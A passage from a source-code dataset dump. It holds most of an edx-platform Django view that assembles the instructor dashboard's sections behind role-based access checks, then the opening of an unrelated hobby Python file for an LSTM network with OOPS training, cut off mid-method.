course_key = CourseKey.from_string(course_id)
except InvalidKeyError:
log.error(u"Unable to find course with course key %s while loading the Instructor Dashboard.", course_id)
return HttpResponseServerError()
course = get_course_by_id(course_key, depth=0)
access = {
'admin': request.user.is_staff,
'instructor': bool(has_access(request.user, 'instructor', course)),
'finance_admin': CourseFinanceAdminRole(course_key).has_user(request.user),
'sales_admin': CourseSalesAdminRole(course_key).has_user(request.user),
'staff': bool(has_access(request.user, 'staff', course)),
'forum_admin': has_forum_access(request.user, course_key, FORUM_ROLE_ADMINISTRATOR),
}
if not access['staff']:
raise Http404()
is_white_label = CourseMode.is_white_label(course_key)
reports_enabled = configuration_helpers.get_value('SHOW_ECOMMERCE_REPORTS', False)
sections = [
_section_course_info(course, access),
_section_membership(course, access, is_white_label),
_section_cohort_management(course, access),
_section_discussions_management(course, access),
_section_student_admin(course, access),
_section_data_download(course, access),
]
analytics_dashboard_message = None
if show_analytics_dashboard_message(course_key):
# Construct a URL to the external analytics dashboard
analytics_dashboard_url = '{0}/courses/{1}'.format(settings.ANALYTICS_DASHBOARD_URL, unicode(course_key))
link_start = HTML("<a href=\"{}\" target=\"_blank\">").format(analytics_dashboard_url)
analytics_dashboard_message = _(
"To gain insights into student enrollment and participation {link_start}"
"visit {analytics_dashboard_name}, our new course analytics product{link_end}."
)
analytics_dashboard_message = Text(analytics_dashboard_message).format(
link_start=link_start, link_end=HTML("</a>"), analytics_dashboard_name=settings.ANALYTICS_DASHBOARD_NAME)
# Temporarily show the "Analytics" section until we have a better way of linking to Insights
sections.append(_section_analytics(course, access))
# Check if there is corresponding entry in the CourseMode Table related to the Instructor Dashboard course
course_mode_has_price = False
paid_modes = CourseMode.paid_modes_for_course(course_key)
if len(paid_modes) == 1:
course_mode_has_price = True
elif len(paid_modes) > 1:
log.error(
u"Course %s has %s course modes with payment options. Course must only have "
u"one paid course mode to enable eCommerce options.",
unicode(course_key), len(paid_modes)
)
if settings.FEATURES.get('INDIVIDUAL_DUE_DATES') and access['instructor']:
sections.insert(3, _section_extensions(course))
# Gate access to course email by feature flag & by course-specific authorization
if BulkEmailFlag.feature_enabled(course_key):
sections.append(_section_send_email(course, access))
# Gate access to Metrics tab by feature flag and staff authorization
if settings.FEATURES['CLASS_DASHBOARD'] and access['staff']:
sections.append(_section_metrics(course, access))
# Gate access to Ecommerce tab
if course_mode_has_price and (access['finance_admin'] or access['sales_admin']):
sections.append(_section_e_commerce(course, access, paid_modes[0], is_white_label, reports_enabled))
# Gate access to Special Exam tab depending if either timed exams or proctored exams
# are enabled in the course
user_has_access = any([
request.user.is_staff,
CourseStaffRole(course_key).has_user(request.user),
CourseInstructorRole(course_key).has_user(request.user)
])
course_has_special_exams = course.enable_proctored_exams or course.enable_timed_exams
can_see_special_exams = course_has_special_exams and user_has_access and settings.FEATURES.get(
'ENABLE_SPECIAL_EXAMS', False)
if can_see_special_exams:
sections.append(_section_special_exams(course, access))
# Certificates panel
# This is used to generate example certificates
# and enable self-generated certificates for a course.
# Note: This is hidden for all CCXs
certs_enabled = CertificateGenerationConfiguration.current().enabled and not hasattr(course_key, 'ccx')
if certs_enabled and access['admin']:
sections.append(_section_certificates(course))
# define a generic function to get any category of xblock
def get_course_blocks(course_key, category):
"""
Retrieve all XBlocks in the course for a particular category.
Returns only XBlocks that are published and haven't been deleted.
"""
# Note: we need to check if found components have been orphaned
# due to a bug in split modulestore (PLAT-799). Once that bug
# is resolved, we can skip the `_is_in_course_tree()` check entirely.
return [
block for block in modulestore().get_items(
course_key,
qualifiers={"category": category},
)
]
openassessment_blocks = modulestore().get_items(
course_key, qualifiers={'category': 'openassessment'}
)
# filter out orphaned openassessment blocks
openassessment_blocks = [
block for block in openassessment_blocks if block.parent is not None
]
if len(openassessment_blocks) > 0:
sections.append(_section_open_response_assessment(request, course, openassessment_blocks, access))
# Get all the recap xblocks in a course
recap_blocks = get_course_blocks(course_key, "recap")
# Add the Recap instructor dashboard tab if there is a recap Xblock
if len(recap_blocks) > 0:
sections.append(_section_recap(request, course, recap_blocks, access))
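# Disable certain dashboard buttons when enrollment exceeds MAX_ENROLLMENT_INSTR_BUTTONS (see _is_small_course)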
disable_buttons = not _is_small_course(course_key)
certificate_white_list = CertificateWhitelist.get_certificate_white_list(course_key)
generate_certificate_exceptions_url = reverse( # pylint: disable=invalid-name
'generate_certificate_exceptions',
kwargs={'course_id': unicode(course_key), 'generate_for': ''}
)
generate_bulk_certificate_exceptions_url = reverse( # pylint: disable=invalid-name
'generate_bulk_certificate_exceptions',
kwargs={'course_id': unicode(course_key)}
)
certificate_exception_view_url = reverse(
'certificate_exception_view',
kwargs={'course_id': unicode(course_key)}
)
certificate_invalidation_view_url = reverse( # pylint: disable=invalid-name
'certificate_invalidation_view',
kwargs={'course_id': unicode(course_key)}
)
certificate_invalidations = CertificateInvalidation.get_certificate_invalidations(course_key)
context = {
'course': course,
'studio_url': get_studio_url(course, 'course'),
'sections': sections,
'disable_buttons': disable_buttons,
'analytics_dashboard_message': analytics_dashboard_message,
'certificate_white_list': certificate_white_list,
'certificate_invalidations': certificate_invalidations,
'generate_certificate_exceptions_url': generate_certificate_exceptions_url,
'generate_bulk_certificate_exceptions_url': generate_bulk_certificate_exceptions_url,
'certificate_exception_view_url': certificate_exception_view_url,
'certificate_invalidation_view_url': certificate_invalidation_view_url,
}
return render_to_response('instructor/instructor_dashboard_2/instructor_dashboard_2.html', context)
## Section functions starting with _section return a dictionary of section data.
## The dictionary must include at least {
## 'section_key': 'circus_expo'
## 'section_display_name': 'Circus Expo'
## }
## section_key will be used as a css attribute, javascript tie-in, and template import filename.
## section_display_name will be used to generate link titles in the nav bar.
def _section_e_commerce(course, access, paid_mode, coupons_enabled, reports_enabled):
""" Provide data for the corresponding dashboard section """
course_key = course.id
coupons = Coupon.objects.filter(course_id=course_key).order_by('-is_active')
course_price = paid_mode.min_price
total_amount = None
if access['finance_admin']:
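# Course revenue is the sum of single-seat purchases and bulk registration-code purchases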
single_purchase_total = PaidCourseRegistration.get_total_amount_of_purchased_item(course_key)
bulk_purchase_total = CourseRegCodeItem.get_total_amount_of_purchased_item(course_key)
total_amount = single_purchase_total + bulk_purchase_total
section_data = {
'section_key': 'e-commerce',
'section_display_name': _('E-Commerce'),
'access': access,
'course_id': unicode(course_key),
'currency_symbol': configuration_helpers.get_value('PAID_COURSE_REGISTRATION_CURRENCY', settings.PAID_COURSE_REGISTRATION_CURRENCY)[1],
'ajax_remove_coupon_url': reverse('remove_coupon', kwargs={'course_id': unicode(course_key)}),
'ajax_get_coupon_info': reverse('get_coupon_info', kwargs={'course_id': unicode(course_key)}),
'get_user_invoice_preference_url': reverse('get_user_invoice_preference', kwargs={'course_id': unicode(course_key)}),
'sale_validation_url': reverse('sale_validation', kwargs={'course_id': unicode(course_key)}),
'ajax_update_coupon': reverse('update_coupon', kwargs={'course_id': unicode(course_key)}),
'ajax_add_coupon': reverse('add_coupon', kwargs={'course_id': unicode(course_key)}),
'get_sale_records_url': reverse('get_sale_records', kwargs={'course_id': unicode(course_key)}),
'get_sale_order_records_url': reverse('get_sale_order_records', kwargs={'course_id': unicode(course_key)}),
'instructor_url': reverse('instructor_dashboard', kwargs={'course_id': unicode(course_key)}),
'get_registration_code_csv_url': reverse('get_registration_codes', kwargs={'course_id': unicode(course_key)}),
'generate_registration_code_csv_url': reverse('generate_registration_codes', kwargs={'course_id': unicode(course_key)}),
'active_registration_code_csv_url': reverse('active_registration_codes', kwargs={'course_id': unicode(course_key)}),
'spent_registration_code_csv_url': reverse('spent_registration_codes', kwargs={'course_id': unicode(course_key)}),
'set_course_mode_url': reverse('set_course_mode_price', kwargs={'course_id': unicode(course_key)}),
'download_coupon_codes_url': reverse('get_coupon_codes', kwargs={'course_id': unicode(course_key)}),
'enrollment_report_url': reverse('get_enrollment_report', kwargs={'course_id': unicode(course_key)}),
'exec_summary_report_url': reverse('get_exec_summary_report', kwargs={'course_id': unicode(course_key)}),
'list_financial_report_downloads_url': reverse('list_financial_report_downloads',
kwargs={'course_id': unicode(course_key)}),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
'look_up_registration_code': reverse('look_up_registration_code', kwargs={'course_id': unicode(course_key)}),
'coupons': coupons,
'sales_admin': access['sales_admin'],
'coupons_enabled': coupons_enabled,
'reports_enabled': reports_enabled,
'course_price': course_price,
'total_amount': total_amount,
'is_ecommerce_course': is_ecommerce_course(course_key)
}
return section_data
def _section_special_exams(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
section_data = {
'section_key': 'special_exams',
'section_display_name': _('Special Exams'),
'access': access,
'course_id': unicode(course_key)
}
return section_data
def _section_certificates(course):
"""Section information for the certificates panel.
The certificates panel allows global staff to generate
example certificates and enable self-generated certificates
for a course.
Arguments:
course (Course)
Returns:
dict
"""
example_cert_status = None
html_cert_enabled = certs_api.has_html_certificates_enabled(course)
if html_cert_enabled:
can_enable_for_course = True
else:
example_cert_status = certs_api.example_certificates_status(course.id)
# Allow the user to enable self-generated certificates for students
# *only* once a set of example certificates has been successfully generated.
# If certificates have been misconfigured for the course (for example, if
# the PDF template hasn't been uploaded yet), then we don't want
# to turn on self-generated certificates for students!
can_enable_for_course = (
example_cert_status is not None and
all(
cert_status['status'] == 'success'
for cert_status in example_cert_status
)
)
instructor_generation_enabled = settings.FEATURES.get('CERTIFICATES_INSTRUCTOR_GENERATION', False)
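# Map each generated-certificate status to the number of certificates with that status in this course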
certificate_statuses_with_count = {
certificate['status']: certificate['count']
for certificate in GeneratedCertificate.get_unique_statuses(course_key=course.id)
}
return {
'section_key': 'certificates',
'section_display_name': _('Certificates'),
'example_certificate_status': example_cert_status,
'can_enable_for_course': can_enable_for_course,
'enabled_for_course': certs_api.cert_generation_enabled(course.id),
'is_self_paced': course.self_paced,
'instructor_generation_enabled': instructor_generation_enabled,
'html_cert_enabled': html_cert_enabled,
'active_certificate': certs_api.get_active_web_certificate(course),
'certificate_statuses_with_count': certificate_statuses_with_count,
'status': CertificateStatuses,
'certificate_generation_history':
CertificateGenerationHistory.objects.filter(course_id=course.id).order_by("-created"),
'urls': {
'generate_example_certificates': reverse(
'generate_example_certificates',
kwargs={'course_id': course.id}
),
'enable_certificate_generation': reverse(
'enable_certificate_generation',
kwargs={'course_id': course.id}
),
'start_certificate_generation': reverse(
'start_certificate_generation',
kwargs={'course_id': course.id}
),
'start_certificate_regeneration': reverse(
'start_certificate_regeneration',
kwargs={'course_id': course.id}
),
'list_instructor_tasks_url': reverse(
'list_instructor_tasks',
kwargs={'course_id': course.id}
),
}
}
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@require_POST
@login_required
def set_course_mode_price(request, course_id):
"""
set the new course price and add new entry in the CourseModesArchive Table
"""
try:
course_price = int(request.POST['course_price'])
except ValueError:
return JsonResponse(
{'message': _("Please Enter the numeric value for the course price")},
status=400) # status code 400: Bad Request
currency = request.POST['currency']
course_key = CourseKey.from_string(course_id)
course_honor_mode = CourseMode.objects.filter(mode_slug='honor', course_id=course_key)
if not course_honor_mode:
return JsonResponse(
{'message': _("CourseMode with the mode slug({mode_slug}) DoesNotExist").format(mode_slug='honor')},
status=400) # status code 400: Bad Request
CourseModesArchive.objects.create(
course_id=course_id, mode_slug='honor', mode_display_name='Honor Code Certificate',
min_price=course_honor_mode[0].min_price, currency=course_honor_mode[0].currency,
expiration_datetime=datetime.datetime.now(pytz.utc), expiration_date=datetime.date.today()
)
course_honor_mode.update(
min_price=course_price,
currency=currency
)
return JsonResponse({'message': _("CourseMode price updated successfully")})
def _section_course_info(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
section_data = {
'section_key': 'course_info',
'section_display_name': _('Course Info'),
'access': access,
'course_org': course.display_org_with_default,
'course_number': course.display_number_with_default,
'course_name': course.display_name,
'course_display_name': course.display_name_with_default,
'has_started': course.has_started(),
'has_ended': course.has_ended(),
'start_date': course.start,
'end_date': course.end,
'num_sections': len(course.children),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
}
if settings.FEATURES.get('DISPLAY_ANALYTICS_ENROLLMENTS'):
section_data['enrollment_count'] = CourseEnrollment.objects.enrollment_counts(course_key)
if show_analytics_dashboard_message(course_key):
# dashboard_link is already made safe in _get_dashboard_link
dashboard_link = _get_dashboard_link(course_key)
# so we can use Text() here so it is not double-escaped and renders as HTML on the front end
message = Text(_("Enrollment data is now available in {dashboard_link}.")).format(dashboard_link=dashboard_link)
section_data['enrollment_message'] = message
if settings.FEATURES.get('ENABLE_SYSADMIN_DASHBOARD'):
section_data['detailed_gitlogs_url'] = reverse('gitlogs_detail', kwargs={'course_id': unicode(course_key)})
try:
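# Build a single comma-separated display string of the course's letter-grade cutoffs.
# The lambda relies on Python 2 tuple-parameter unpacking of (letter, score) pairs.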
sorted_cutoffs = sorted(course.grade_cutoffs.items(), key=lambda i: i[1], reverse=True)
advance = lambda memo, (letter, score): "{}: {}, ".format(letter, score) + memo
section_data['grade_cutoffs'] = reduce(advance, sorted_cutoffs, "")[:-2]
except Exception: # pylint: disable=broad-except
section_data['grade_cutoffs'] = "Not Available"
try:
section_data['course_errors'] = [(escape(a), '') for (a, _unused) in modulestore().get_course_errors(course.id)]
except Exception: # pylint: disable=broad-except
section_data['course_errors'] = [('Error fetching errors', '')]
return section_data
def _section_membership(course, access, is_white_label):
""" Provide data for the corresponding dashboard section """
course_key = course.id
ccx_enabled = settings.FEATURES.get('CUSTOM_COURSES_EDX', False) and course.enable_ccx
section_data = {
'section_key': 'membership',
'section_display_name': _('Membership'),
'access': access,
'ccx_is_enabled': ccx_enabled,
'is_white_label': is_white_label,
'enroll_button_url': reverse('students_update_enrollment', kwargs={'course_id': unicode(course_key)}),
'unenroll_button_url': reverse('students_update_enrollment', kwargs={'course_id': unicode(course_key)}),
'upload_student_csv_button_url': reverse('register_and_enroll_students', kwargs={'course_id': unicode(course_key)}),
'modify_beta_testers_button_url': reverse('bulk_beta_modify_access', kwargs={'course_id': unicode(course_key)}),
'list_course_role_members_url': reverse('list_course_role_members', kwargs={'course_id': unicode(course_key)}),
'modify_access_url': reverse('modify_access', kwargs={'course_id': unicode(course_key)}),
'list_forum_members_url': reverse('list_forum_members', kwargs={'course_id': unicode(course_key)}),
'update_forum_role_membership_url': reverse('update_forum_role_membership', kwargs={'course_id': unicode(course_key)}),
}
return section_data
def _section_cohort_management(course, access):
""" Provide data for the corresponding cohort management section """
course_key = course.id
ccx_enabled = hasattr(course_key, 'ccx')
section_data = {
'section_key': 'cohort_management',
'section_display_name': _('Cohorts'),
'access': access,
'ccx_is_enabled': ccx_enabled,
'course_cohort_settings_url': reverse(
'course_cohort_settings',
kwargs={'course_key_string': unicode(course_key)}
),
'cohorts_url': reverse('cohorts', kwargs={'course_key_string': unicode(course_key)}),
'upload_cohorts_csv_url': reverse('add_users_to_cohorts', kwargs={'course_id': unicode(course_key)}),
'verified_track_cohorting_url': reverse(
'verified_track_cohorting', kwargs={'course_key_string': unicode(course_key)}
),
}
return section_data
def _section_discussions_management(course, access):
""" Provide data for the corresponding discussion management section """
course_key = course.id
enrollment_track_schemes = available_division_schemes(course_key)
section_data = {
'section_key': 'discussions_management',
'section_display_name': _('Discussions'),
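# Hide the Discussions section unless the course is cohorted or supports enrollment-track based division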
'is_hidden': (not is_course_cohorted(course_key) and
CourseDiscussionSettings.ENROLLMENT_TRACK not in enrollment_track_schemes),
'discussion_topics_url': reverse('discussion_topics', kwargs={'course_key_string': unicode(course_key)}),
'course_discussion_settings': reverse(
'course_discussions_settings',
kwargs={'course_key_string': unicode(course_key)}
),
}
return section_data
def _is_small_course(course_key):
""" Compares against MAX_ENROLLMENT_INSTR_BUTTONS to determine if course enrollment is considered small. """
is_small_course = False
enrollment_count = CourseEnrollment.objects.num_enrolled_in(course_key)
max_enrollment_for_buttons = settings.FEATURES.get("MAX_ENROLLMENT_INSTR_BUTTONS")
if max_enrollment_for_buttons is not None:
is_small_course = enrollment_count <= max_enrollment_for_buttons
return is_small_course
def _section_student_admin(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
is_small_course = _is_small_course(course_key)
section_data = {
'section_key': 'student_admin',
'section_display_name': _('Student Admin'),
'access': access,
'is_small_course': is_small_course,
'get_student_progress_url_url': reverse('get_student_progress_url', kwargs={'course_id': unicode(course_key)}),
'enrollment_url': reverse('students_update_enrollment', kwargs={'course_id': unicode(course_key)}),
'reset_student_attempts_url': reverse('reset_student_attempts', kwargs={'course_id': unicode(course_key)}),
'reset_student_attempts_for_entrance_exam_url': reverse(
'reset_student_attempts_for_entrance_exam',
kwargs={'course_id': unicode(course_key)},
),
'rescore_problem_url': reverse('rescore_problem', kwargs={'course_id': unicode(course_key)}),
'override_problem_score_url': reverse('override_problem_score', kwargs={'course_id': unicode(course_key)}),
'rescore_entrance_exam_url': reverse('rescore_entrance_exam', kwargs={'course_id': unicode(course_key)}),
'student_can_skip_entrance_exam_url': reverse(
'mark_student_can_skip_entrance_exam',
kwargs={'course_id': unicode(course_key)},
),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
'list_entrace_exam_instructor_tasks_url': reverse('list_entrance_exam_instructor_tasks',
kwargs={'course_id': unicode(course_key)}),
'spoc_gradebook_url': reverse('spoc_gradebook', kwargs={'course_id': unicode(course_key)}),
}
return section_data
def _section_extensions(course):
""" Provide data for the corresponding dashboard section """
section_data = {
'section_key': 'extensions',
'section_display_name': _('Extensions'),
'units_with_due_dates': [(title_or_url(unit), unicode(unit.location))
for unit in get_units_with_due_date(course)],
'change_due_date_url': reverse('change_due_date', kwargs={'course_id': unicode(course.id)}),
'reset_due_date_url': reverse('reset_due_date', kwargs={'course_id': unicode(course.id)}),
'show_unit_extensions_url': reverse('show_unit_extensions', kwargs={'course_id': unicode(course.id)}),
'show_student_extensions_url': reverse('show_student_extensions', kwargs={'course_id': unicode(course.id)}),
}
return section_data
def _section_data_download(course, access):
""" Provide data for the corresponding dashboard section """
course_key = course.id
show_proctored_report_button = (
settings.FEATURES.get('ENABLE_SPECIAL_EXAMS', False) and
course.enable_proctored_exams
)
section_data = {
'section_key': 'data_download',
'section_display_name': _('Data Download'),
'access': access,
'show_generate_proctored_exam_report_button': show_proctored_report_button,
'get_problem_responses_url': reverse('get_problem_responses', kwargs={'course_id': unicode(course_key)}),
'get_grading_config_url': reverse('get_grading_config', kwargs={'course_id': unicode(course_key)}),
'get_students_features_url': reverse('get_students_features', kwargs={'course_id': unicode(course_key)}),
'get_issued_certificates_url': reverse(
'get_issued_certificates', kwargs={'course_id': unicode(course_key)}
),
'get_students_who_may_enroll_url': reverse(
'get_students_who_may_enroll', kwargs={'course_id': unicode(course_key)}
),
'get_students_certificates_status_url': reverse(
'get_students_certificates_status', kwargs={'course_id': unicode(course_key)}
),
'get_anon_ids_url': reverse('get_anon_ids', kwargs={'course_id': unicode(course_key)}),
'list_proctored_results_url': reverse('get_proctored_exam_results', kwargs={'course_id': unicode(course_key)}),
'list_instructor_tasks_url': reverse('list_instructor_tasks', kwargs={'course_id': unicode(course_key)}),
'list_report_downloads_url': reverse('list_report_downloads', kwargs={'course_id': unicode(course_key)}),
'calculate_grades_csv_url': reverse('calculate_grades_csv', kwargs={'course_id': unicode(course_key)}),
'problem_grade_report_url': reverse('problem_grade_report', kwargs={'course_id': unicode(course_key)}),
'course_has_survey': True if course.course_survey_name else False,
'course_survey_results_url': reverse('get_course_survey_results', kwargs={'course_id': unicode(course_key)}),
'export_ora2_data_url': reverse('export_ora2_data', kwargs={'course_id': unicode(course_key)}),
}
return section_data
def null_applicable_aside_types(block): # pylint: disable=unused-argument
"""
get_aside method for monkey-patching into applicable_aside_types
while rendering an HtmlDescriptor for email text editing. This returns
an empty list.
"""
return []
def _section_send_email(course, access):
""" Provide data for the corresponding bulk email section """
course_key = course.id
# Monkey-patch applicable_aside_types to return no asides for the duration of this render
with patch.object(course.runtime, 'applicable_aside_types', null_applicable_aside_types):
# This HtmlDescriptor is only being used to generate a nice text editor.
html_module = HtmlDescriptor(
course.system,
DictFieldData({'data': ''}),
ScopeIds(None, None, None, course_key.make_usage_key('html', 'fake'))
)
fragment = course.system.render(html_module, 'studio_view')
fragment = wrap_xblock(
'LmsRuntime', html_module, 'studio_view', fragment, None,
extra_data={"course-id": unicode(course_key)},
usage_id_serializer=lambda usage_id: quote_slashes(unicode(usage_id)),
# Generate a new request_token here at random, because this module isn't connected to any other
# xblock rendering.
request_token=uuid.uuid1().get_hex()
)
cohorts = []
if is_course_cohorted(course_key):
cohorts = get_course_cohorts(course)
course_modes = []
if not VerifiedTrackCohortedCourse.is_verified_track_cohort_enabled(course_key):
course_modes = CourseMode.modes_for_course(course_key, include_expired=True, only_selectable=False)
email_editor = fragment.content
section_data = {
'section_key': 'send_email',
'section_display_name': _('Email'),
'access': access,
'send_email': reverse('send_email', kwargs={'course_id': unicode(course_key)}),
'editor': email_editor,
'cohorts': cohorts,
'course_modes': course_modes,
'default_cohort_name': DEFAULT_COHORT_NAME,
'list_instructor_tasks_url': reverse(
'list_instructor_tasks', kwargs={'course_id': unicode(course_key)}
),
'email_background_tasks_url': reverse(
'list_background_email_tasks', kwargs={'course_id': unicode(course_key)}
),
'email_content_history_url': reverse(
'list_email_content', kwargs={'course_id': unicode(course_key)}
),
}
return section_data
def _get_dashboard_link(course_key):
""" Construct a URL to the external analytics dashboard """
analytics_dashboard_url = '{0}/courses/{1}'.format(settings.ANALYTICS_DASHBOARD_URL, unicode(course_key))
link = HTML(u"<a href=\"{0}\" target=\"_blank\">{1}</a>").format(
analytics_dashboard_url, settings.ANALYTICS_DASHBOARD_NAME
)
return link
def _section_analytics(course, access):
""" Provide data for the corresponding dashboard section """
section_data = {
'section_key': 'instructor_analytics',
'section_display_name': _('Analytics'),
'access': access,
'course_id': unicode(course.id),
}
return section_data
def _section_metrics(course, access):
"""Provide data for the corresponding dashboard section """
course_key = course.id
section_data = {
'section_key': 'metrics',
'section_display_name': _('Metrics'),
'access': access,
'course_id': unicode(course_key),
'sub_section_display_name': get_section_display_name(course_key),
'section_has_problem': get_array_section_has_problem(course_key),
'get_students_opened_subsection_url': reverse('get_students_opened_subsection'),
'get_students_problem_grades_url': reverse('get_students_problem_grades'),
'post_metrics_data_csv_url': reverse('post_metrics_data_csv'),
}
return section_data
def _section_open_response_assessment(request, course, openassessment_blocks, access):
"""Provide data for the corresponding dashboard section """
course_key = course.id
ora_items = []
parents = {}
for block in openassessment_blocks:
block_parent_id = unicode(block.parent)
result_item_id = unicode(block.location)
if block_parent_id not in parents:
parents[block_parent_id] = modulestore().get_item(block.parent)
ora_items.append({
'id': result_item_id,
'name': block.display_name,
'parent_id': block_parent_id,
'parent_name': parents[block_parent_id].display_name,
'staff_assessment': 'staff-assessment' in block.assessment_steps,
'url_base': reverse('xblock_view', args=[course.id, block.location, 'student_view']),
'url_grade_available_responses': reverse('xblock_view', args=[course.id, block.location,
'grade_available_responses_view']),
})
openassessment_block = openassessment_blocks[0]
block, __ = get_module_by_usage_id(
request, unicode(course_key), unicode(openassessment_block.location),
disable_staff_debug_info=True, course=course
)
section_data = {
'fragment': block.render('ora_blocks_listing_view', context={
'ora_items': ora_items,
'ora_item_view_enabled': settings.FEATURES.get('ENABLE_XBLOCK_VIEW_ENDPOINT', False)
}),
'section_key': 'open_response_assessment',
'section_display_name': _('Open Responses'),
'access': access,
'course_id': unicode(course_key),
}
return section_data
def _section_recap(request, course, recap_blocks, access):
"""Provide data for the Recap dashboard section """
course_key = course.id
recap_block = recap_blocks[0]
block, __ = get_module_by_usage_id(
request, unicode(course_key), unicode(recap_block.location),
disable_staff_debug_info=True, course=course
)
# Set up recap instructor dashboard fragment, pass data to the context
fragment = block.render('recap_blocks_listing_view', context={})
# Wrap the fragment and get all resources associated with this XBlock view
fragment = wrap_xblock(
'LmsRuntime', recap_block, 'recap_blocks_listing_view', fragment, None,
extra_data={"course-id": unicode(course_key)},
usage_id_serializer=lambda usage_id: quote_slashes(unicode(usage_id)),
# Generate a new request_token here at random, because this module isn't connected to any other
# xblock rendering.
request_token=uuid.uuid1().get_hex()
)
section_data = {
'fragment': fragment,
'section_key': 'recap',
'section_display_name': _('Recap'),
'access': access,
'course_id': unicode(course_key)
}
return section_data
def is_ecommerce_course(course_key):
"""
Checks if the given course is an e-commerce course or not, by checking its SKU value from
CourseMode records for the course
"""
sku_count = len([mode.sku for mode in CourseMode.modes_for_course(course_key) if mode.sku])
return sku_count > 0
|
proversity-org/edx-platform
|
lms/djangoapps/instructor/views/instructor_dashboard.py
|
Python
|
agpl-3.0
| 38,981
|
[
"VisIt"
] |
ec57c02a441cbc24befb06042a5ee0de472d6c1ab4cf77219db9b28ff92e9930
|
#! /usr/bin/python
"""
Python LSTM (Long short term memory)
with OOPS training (Optimal Ordering Problem Solver)
implementation.
OOPS is an alternative training method that avoids some
of the drawbacks in back-propogation (ie: local minima)
training. An OOPS trainer also allows both supervised
(training examples) and unsupervised (reinforcement learning)
training.
Copyright (C) 2013 Christopher BRIAN Jack (gau_veldt@hotmail.com)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import pygame,os
pygame.init()
size=(640,320)
visual=pygame.display.set_mode(size,pygame.DOUBLEBUF)
elapsed=0
since=pygame.time.get_ticks()
framerate=1000.0/60.0
font=pygame.font.SysFont("courier",18)
textregion=pygame.Rect(0,230,640,30)
import math
import random
import sys
import pprint
from functools import partial
NDEBUG=False
EntropySource=random.SystemRandom()
Formatter=pprint.PrettyPrinter(indent=2)
def blackhole(*args,**kwargs):
pass
if NDEBUG:
debug=blackhole
else:
debug=print
def log(self,msg,which='testLog'):
target=self.logs[which]
target.append(msg)
target=target[-100:]
def last(self,which='testLog'):
try:
return self.logs[which][-1]
except:
pass
_serNo=0
def serNo():
global _serNo
_serNo+=1
return _serNo
log.logs={}
log.logs['testLog']=[]
log.logs['solveLog']=[]
log.last=partial(last,log)
log.log=partial(log,log)
halfPi=math.pi/2.0
twoPi=math.pi*2.0
def sigmoid(x):
"""
Sigmoid function
"""
rc=1/(1+math.exp(-x))
return rc
def dtSigmoid(x):
"""
rate of change of sigmoid at x
(derivative)
"""
sx=sigmoid(x)
return sx*(1-sx)
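# Illustrative sketch (added for clarity, not part of the original file): a quick
# finite-difference sanity check of dtSigmoid against sigmoid. For example,
# _check_dtSigmoid(0.0) returns two values that are both very close to 0.25.
def _check_dtSigmoid(x,h=1e-6):
    """ return (analytic, numeric) estimates of the sigmoid derivative at x """
    analytic=dtSigmoid(x)
    numeric=(sigmoid(x+h)-sigmoid(x-h))/(2.0*h)
    return analytic,numeric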
def bin2gray(b):
return b[:1]+''.join([str(int(i) ^ int(ishift)) for i, ishift in zip(b[:-1],b[1:])])
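# Worked example (added comment, not in the original): bin2gray("1011") keeps the
# leading '1', then XORs the neighbouring pairs ('1','0'),('0','1'),('1','1') to
# get "110", so the Gray-code result is "1110".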
def searchCurve(a):
if a<halfPi:
return 1.0-math.sin(a)
else:
return -1.0-math.sin(a)
class TopologyError(Exception):
""" When something goes wrong in topology """
def __init__(self,val):
self.value=val
def __str__(self):
return self.value
class Terminal:
def __init__(self,*args,**kwargs):
self.value=0.0
self.serNo=serNo()
def write(self,val,**kwargs):
self.value=val
def read(self,**kwargs):
return self.value
def __eq__(self,other):
return hash(self)==hash(other)
def __hash__(self):
return self.serNo
def __lt__(self,other):
return self.serNo<other.serNo
class Input(Terminal):
def __init__(self,*args,**kwargs):
super(Input,self).__init__(*args,**kwargs)
def __str__(self):
return "ITERM+%s=%s" % (self.serno,self.value)
class Output(Terminal):
count=0
def __init__(self,*args,**kwargs):
super(Output,self).__init__(*args,**kwargs)
def __str__(self):
return "OTERM%s=%s" % (self.serno,self.value)
class Topology:
"""
Maintains ANN/RNN network topology
Manages node-to-node connections,
connection weights and activation traversal.
Connections may contain cycles (recurrent network).
When an input changes network will reflect it
immediately. The nodes will be activated in
hop count order recursively so long as it has
not already activated on this input's time step.
This allows local adaptation to any asymmetry of
    individual input's information flow and timing of
individual input change.
Nodes must provide methods AvailableConnectionPoints(),
Activate() and read("connName").
AvailableConnectionPoints():
returns a dictionary of connection types:
{ "connName" : connType, ...}
connType is one of:
0: input - connName is a sink
1: output - connName is a source
Activate() will be called to run node cycle
read("connName")
- reads value connName
"""
def __init__(self,*args,**kwargs):
self.connections={}
self.nodeRefs={}
self.outRefs={}
        self.SquishOutput=True
        self.ordered=None
    def enableOutputLogistic(self,enable=True):
"""
Enables or disables logistical
squishing of output terminal values
"""
self.SquishOutput=enable
def makeOrdered(self):
ordered=[]
visited={C:False for C in self.connections}
# dry run activation pass (no states are harmed)
# to yield connections in order they
# will be accessed but we want
# the first connection access to
# be at the end of the list
for n in self.nodeRefs:
# the nodes we want are all the ones connected
# to any input channels (we rely on the node
# object to order this list so the non-depending
# inputs come first). for instance an LSTM node
# lists outputgate after forgetgate since outputgate
# may source the peephole which depends on forgetgate
# (this is a special dependency specific to the LSTM
# node's implementation of peepholes to allow output
# gates to react to a *change* in CEC state)
for ch in n.availableConnectionPoints(InputOnly=True):
sources=self.getSources(n,ch)
for s in sources:
if not visited[s]:
ordered=[s]+ordered
visited[s]=True
for n in self.outRefs:
# now the output edges
sources=self.getSources(n,Output)
for s in sources:
if not visited[s]:
ordered=[s]+ordered
